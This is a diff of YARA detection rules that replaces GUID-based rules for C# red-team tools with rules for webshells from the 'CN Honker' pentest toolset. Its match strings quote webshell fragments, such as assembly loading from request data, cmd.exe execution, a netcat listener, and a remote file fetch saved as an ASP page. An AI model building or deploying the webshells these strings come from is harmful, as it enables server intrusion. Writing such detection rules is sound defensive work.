+		author = "Florian Roth (Nextron Systems)"
+		id = "cd34cb47-c5e0-5094-a501-6a8a00d94018"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L809-L823"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "90d05afe605d90dd61e8f5095125eb30c2b7a781b90b9ab42ee8391823b53b83"
-		score = 75
+		hash = "65e8e4d13ad257c820cad12eef853c6d0134fce8"
+		logic_hash = "98f279c3e50308f67f88ecf8459943187ea152664fe0206c4a7d3435242df2a6"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "7266acbb-b10d-4873-9b99-12d2043b1d4e" ascii wide
-		$typelibguid0up = "7266ACBB-B10D-4873-9B99-12D2043B1D4E" ascii wide
-		$typelibguid1lo = "5d9515d0-df67-40ed-a6b2-6619620ef0ef" ascii wide
-		$typelibguid1up = "5D9515D0-DF67-40ED-A6B2-6619620EF0EF" ascii wide
+		$s0 = "lcx.jsp?localIP=202.91.246.59&localPort=88&remoteIP=218.232.111.187&remotePort=2" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 1KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Povlsomware : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_ASPX_Aspx3 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "0eba43d2-b415-5e72-9677-4a3238ff7c34"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/povlteksttv/Povlsomware"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L154-L168"
+		description = "Webshell from CN Honker Pentest Toolset - file aspx3.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4f835136-744a-5324-a1f4-02d1cfa2cab6"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L825-L840"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "681603aa09b83f1a5a56c26204a4a5338c14627f977b29d3edc28a50149756d4"
-		score = 75
+		hash = "dd61481771f67d9593214e605e63b62d5400c72f"
+		logic_hash = "11bf511ee70ff4bde0a9320cb80dd9efa0f437d432c78a859153cfcc8e80db01"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "fe0d5aa7-538f-42f6-9ece-b141560f7781" ascii wide
-		$typelibguid0up = "FE0D5AA7-538F-42F6-9ECE-B141560F7781" ascii wide
+		$s0 = "Process p1 = Process.Start(\"\\\"\" + txtRarPath.Value + \"\\\"\", \" a -y -k -m" ascii
+		$s12 = "if (_Debug) System.Console.WriteLine(\"\\ninserting filename into CDS:" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 100KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Runshellcode : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_ASPX_Shell_Shell : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "249da967-68b0-59b1-b414-4eb4fe67b8f3"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/zerosum0x0/RunShellcode"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L170-L184"
+		description = "Webshell from CN Honker Pentest Toolset - file shell.aspx"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8fbcae22-07b7-5afe-9f15-06e2f426b5ca"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L842-L857"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "de9bb2689e10d8a4d4830f6fb5ac35f4433ece1fe61e0f04d72a125e85235a64"
-		score = 75
+		hash = "1816006827d16ed73cefdd2f11bd4c47c8af43e4"
+		logic_hash = "ac22d89353b4316289bf6c6e13332ac401f4b57f6c29b71861cb48359c1e55f9"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "a3ec18a3-674c-4131-a7f5-acbed034b819" ascii wide
-		$typelibguid0up = "A3EC18A3-674C-4131-A7F5-ACBED034B819" ascii wide
+		$s0 = "<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cook" ascii
+		$s1 = "<%@ Page Language=\"C#\" ValidateRequest=\"false\" %>" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 1KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharploginprompt : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell__Php1_Php7_Php9 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "e9a493d9-21b6-5ff1-9e5e-e8fbacc34c0c"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/shantanu561993/SharpLoginPrompt"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L186-L200"
+		description = "Webshell from CN Honker Pentest Toolset - from files php1.txt, php7.txt, php9.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "cfc2f624-976f-5ff6-bd07-10948b9290bc"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L859-L878"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a34873666a7a4a8aff77281fe638b1fd244f5295702cf815846ff64bcc21e360"
-		score = 75
+		logic_hash = "6ea5b362f8d8f2e99725d4dd4d2ada5c3939a45a3dde0084571600452ab4673c"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "c2f4b150f53c78777928921b3a985ec678bfae32"
+		hash1 = "05a3f93dbb6c3705fd5151b6ffb64b53bc555575"
+		hash2 = "cd3962b1dba9f1b389212e38857568b69ca76725"
 
 	strings:
-		$typelibguid0lo = "c12e69cd-78a0-4960-af7e-88cbd794af97" ascii wide
-		$typelibguid0up = "C12E69CD-78A0-4960-AF7E-88CBD794AF97" ascii wide
+		$s1 = "<a href=\"?s=h&o=wscript\">[WScript.shell]</a> " fullword ascii
+		$s2 = "document.getElementById('cmd').value = Str[i];" fullword ascii
+		$s3 = "Str[7] = \"copy c:\\\\\\\\1.php d:\\\\\\\\2.php\";" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Adamantium_Thief : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell__Serv_U_By_Goldsun_Asp3_Serv_U_Asp : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "82225b2e-ab4a-50b8-a3fd-7ad4947d052e"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/LimerBoy/Adamantium-Thief"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L202-L216"
+		description = "Webshell from CN Honker Pentest Toolset - from files Serv-U_by_Goldsun.asp, asp3.txt, Serv-U asp.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e91e05e8-0f6d-57a7-a649-a834733f17c8"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L880-L899"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "089fdba95fb53d412eca2e1188bf9b8211045793122a73ed6c0ea5ee5c386c47"
-		score = 75
+		logic_hash = "b733e80f234a85a4f65eedd94f535860b4da464adb80a91afc547a8d96b5dc7a"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "d4d7a632af65a961a1dbd0cff80d5a5c2b397e8c"
+		hash1 = "87c5a76989bf08da5562e0b75c196dcb3087a27b"
+		hash2 = "cee91cd462a459d31a95ac08fe80c70d2f9c1611"
 
 	strings:
-		$typelibguid0lo = "e6104bc9-fea9-4ee9-b919-28156c1f2ede" ascii wide
-		$typelibguid0up = "E6104BC9-FEA9-4EE9-B919-28156C1F2EDE" ascii wide
+		$s1 = "c.send loginuser & loginpass & mt & deldomain & quit" fullword ascii
+		$s2 = "loginpass = \"Pass \" & pass & vbCrLf" fullword ascii
+		$s3 = "b.send \"User go\" & vbCrLf & \"pass od\" & vbCrLf & \"site exec \" & cmd & vbCr" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 444KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Psbypassclm : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell__Asp4_Asp4_MSSQL__MSSQL_ : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "dad6729f-3d96-5d2d-b72c-a96d1a3eae74"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/padovah4ck/PSByPassCLM"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L218-L232"
+		description = "Webshell from CN Honker Pentest Toolset - from files asp4.txt, asp4.txt, MSSQL_.asp, MSSQL_.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e0070f0d-35d0-5024-88e7-e0e04b29f485"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L901-L921"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "45538484f473f2940344fb89181e309b9925619ea6cf7e66a106cea9e9c6f281"
-		score = 75
+		logic_hash = "a8ec5ad87c83c16f47391c3ce08cee74c6be1e42c288eec6d1559867d28489c6"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "4005b83ced1c032dc657283341617c410bc007b8"
+		hash1 = "4005b83ced1c032dc657283341617c410bc007b8"
+		hash2 = "7097c21f92306983add3b5b29a517204cd6cd819"
+		hash3 = "7097c21f92306983add3b5b29a517204cd6cd819"
 
 	strings:
-		$typelibguid0lo = "46034038-0113-4d75-81fd-eb3b483f2662" ascii wide
-		$typelibguid0up = "46034038-0113-4D75-81FD-EB3B483F2662" ascii wide
+		$s0 = "\"<form name=\"\"searchfileform\"\" action=\"\"?action=searchfile\"\" method=\"" ascii
+		$s1 = "\"<TD ALIGN=\"\"Left\"\" colspan=\"\"5\"\">[\"& DbName & \"]" fullword ascii
+		$s2 = "Set Conn = Nothing " fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 341KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Physmem2Profit : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell__Injection_Jmcook_Jmpost_Manualinjection : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "75a27970-c469-53da-b0c3-b3d0faea0b6f"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/FSecureLABS/physmem2profit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L234-L248"
+		description = "Webshell from CN Honker Pentest Toolset - from files Injection.exe, jmCook.asp, jmPost.asp, ManualInjection.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e154ecb5-9d56-520a-b76a-635a8864f0a8"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L923-L942"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "60385891640e18699e17d1282b4af03ecd0ea3ceaf153bf54560242097595b2f"
-		score = 75
+		logic_hash = "0f3a4f81326154a6a6ac448d18be29ad534917bc39aba26cc458f06b43001681"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "3484ed16e6f9e0d603cbc5cb44e46b8b7e775d35"
+		hash1 = "5e1851c77ce922e682333a3cb83b8506e1d7395d"
+		hash2 = "f80ec26bbdc803786925e8e0450ad7146b2478ff"
+		hash3 = "e83d427f44783088a84e9c231c6816c214434526"
 
 	strings:
-		$typelibguid0lo = "814708c9-2320-42d2-a45f-31e42da06a94" ascii wide
-		$typelibguid0up = "814708C9-2320-42D2-A45F-31E42DA06A94" ascii wide
+		$s1 = "response.write  PostData(JMUrl,JmStr,JmCok,JmRef)" fullword ascii
+		$s2 = "strReturn=Replace(strReturn,chr(43),\"%2B\")  'JMDCW" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 7342KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Noamci : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Cmfshell : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "5fab1551-9d35-53cf-a04f-c14370119553"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/med0x2e/NoAmci"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L250-L264"
+		description = "Webshell from CN Honker Pentest Toolset - file cmfshell.cmf"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c5670deb-952c-5ba4-949a-097cc09bb108"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L944-L959"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4e4b7f6424ce77959bcc017e5f6d36059dda05df7ac09bc7055102c4ff2c10c0"
-		score = 75
+		hash = "b9b2107c946431e4ad1a8f5e53ac05e132935c0e"
+		logic_hash = "f138a82c2d6a831626fe200308eb89cb50ffeec2f2722599eb4ccbd082bad73d"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "352e80ec-72a5-4aa6-aabe-4f9a20393e8e" ascii wide
-		$typelibguid0up = "352E80EC-72A5-4AA6-AABE-4F9A20393E8E" ascii wide
+		$s1 = "<cfexecute name=\"C:\\Winnt\\System32\\cmd.exe\"" fullword ascii
+		$s2 = "<form action=\"<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>\" method=\"post\">" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 4KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpblock : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_PHP_Php4 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "b84538da-1b0e-50c7-abfa-e93d6de5a49b"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/CCob/SharpBlock"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L266-L280"
+		description = "Webshell from CN Honker Pentest Toolset - file php4.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "82446dff-dd1e-54a8-bb70-570bedc805b5"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L961-L975"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4e2583de504884f421425f86fc4364e5bdde55946c19eebbcc64933e03357622"
-		score = 75
+		hash = "179975f632baff6ee4d674fe3fabc324724fee9e"
+		logic_hash = "e625b6d1fd2c1e62306ccae2775ee7b53ddcdd7a6baef55b386dfcd92dc2e764"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "3cf25e04-27e4-4d19-945e-dadc37c81152" ascii wide
-		$typelibguid0up = "3CF25E04-27E4-4D19-945E-DADC37C81152" ascii wide
+		$s0 = "nc -l -vv -p port(" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x4850 and filesize < 1KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Nopowershell : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Linux_2_6_Exploit : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "0fd7496b-e34f-51f7-9270-ad424ed6a7a8"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/bitsadmin/nopowershell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L282-L296"
+		description = "Webshell from CN Honker Pentest Toolset - file 2.6.9"
+		author = "Florian Roth (Nextron Systems)"
+		id = "22e2aca7-418f-598f-af0c-99942aaf3278"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L977-L991"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "29ce3eaf0eca016fd72b54c8773226102cabcfd65d172e42fffe1c29e79d16ec"
-		score = 75
+		hash = "ec22fac0510d0dc2c29d56c55ff7135239b0aeee"
+		logic_hash = "7f3e2937796358a949ce980210ddeb1a606a7b9c2b4d9c4a4acad49bb556dfc8"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "555ad0ac-1fdb-4016-8257-170a74cb2f55" ascii wide
-		$typelibguid0up = "555AD0AC-1FDB-4016-8257-170A74CB2F55" ascii wide
+		$s0 = "[+] Failed to get root :( Something's wrong.  Maybe the kernel isn't vulnerable?" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 56KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Limelogger : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_ASP_Asp2 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "0798f01b-76b7-5c4d-9ddb-5e377b86f8b9"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/NYAN-x-CAT/LimeLogger"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L298-L312"
+		description = "Webshell from CN Honker Pentest Toolset - file asp2.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e5296405-c345-55dc-acd9-be6aca86c60b"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L993-L1009"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1afc5f5f236d66374f5c53f770e8284867632b0373de00283175ed1d424bfa4b"
-		score = 75
+		hash = "b3ac478e72a0457798a3532f6799adeaf4a7fc87"
+		logic_hash = "6107afe9895c4e0c865e78bece160246815a0d3c589bfc79f8b369b94481cd89"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "068d14ef-f0a1-4f9d-8e27-58b4317830c6" ascii wide
-		$typelibguid0up = "068D14EF-F0A1-4F9D-8E27-58B4317830C6" ascii wide
+		$s1 = "<%=server.mappath(request.servervariables(\"script_name\"))%>" fullword ascii
+		$s2 = "webshell</font> <font color=#00FF00>" fullword ascii
+		$s3 = "Userpwd = \"admin\"   'User Password" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 10KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Aggressorscripts : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_FTP_MYSQL_MSSQL_SSH : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "d5903db5-010b-5b9d-8a5b-5d61aec52e7a"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/harleyQu1nn/AggressorScripts"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L314-L328"
+		description = "Webshell from CN Honker Pentest Toolset - file FTP MYSQL MSSQL SSH.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "dd619901-6f0e-527e-9926-808176641c09"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L1011-L1029"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "33982f1f91aa61c54f7c60236389ed78e0a23be5fc04abce6c6574e067522a23"
-		score = 75
+		hash = "fe63b215473584564ef2e08651c77f764999e8ac"
+		logic_hash = "a66884c71ce0cce05ba6607bf66dc55bfae5393746328c06f5c9ca98005d0caf"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "afd1ff09-2632-4087-a30c-43591f32e4e8" ascii wide
-		$typelibguid0up = "AFD1FF09-2632-4087-A30C-43591F32E4E8" ascii wide
+		$s1 = "$_SESSION['hostlist'] = $hostlist = $_POST['hostlist'];" fullword ascii
+		$s2 = "Codz by <a href=\"http://www.sablog.net/blog\">4ngel</a><br />" fullword ascii
+		$s3 = "if ($conn_id = @ftp_connect($host, $ftpport)) {" fullword ascii
+		$s4 = "$_SESSION['sshport'] = $mssqlport = $_POST['sshport'];" fullword ascii
+		$s5 = "<title>ScanPass(FTP/MYSQL/MSSQL/SSH) by 4ngel</title>" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 20KB and 3 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Gopher : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_ASP_Shell : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "e3015719-9085-584d-8237-f377ec995149"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/EncodeGroup/Gopher"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L330-L344"
+		description = "Webshell from CN Honker Pentest Toolset - file shell.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "fdfc3fc1-9400-533b-978b-1a1fac112e1f"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L1031-L1047"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f17688d229c74f0f956a45d9eacfa2bb190c973c097bc870db96edc5c331f436"
-		score = 75
+		hash = "b7b34215c2293ace70fc06cbb9ce73743e867289"
+		logic_hash = "be3961d6568acfaadfa09efda2f914259a59f4e30725c7d434e89f6020e40515"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "b5152683-2514-49ce-9aca-1bc43df1e234" ascii wide
-		$typelibguid0up = "B5152683-2514-49CE-9ACA-1BC43DF1E234" ascii wide
+		$s1 = "xPost.Open \"GET\",\"http://www.i0day.com/1.txt\",False //" fullword ascii
+		$s2 = "sGet.SaveToFile Server.MapPath(\"test.asp\"),2 //" fullword ascii
+		$s3 = "http://hi.baidu.com/xahacker/fuck.txt" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 1KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Aviator : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_PHP_Php7 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "52acd520-52aa-5bb9-ab3b-66a940aa5f5a"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/Ch0pin/AVIator"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L346-L360"
+		description = "Webshell from CN Honker Pentest Toolset - file php7.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f21bb0db-d18a-58c0-a227-5baf5536c57b"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L1049-L1064"
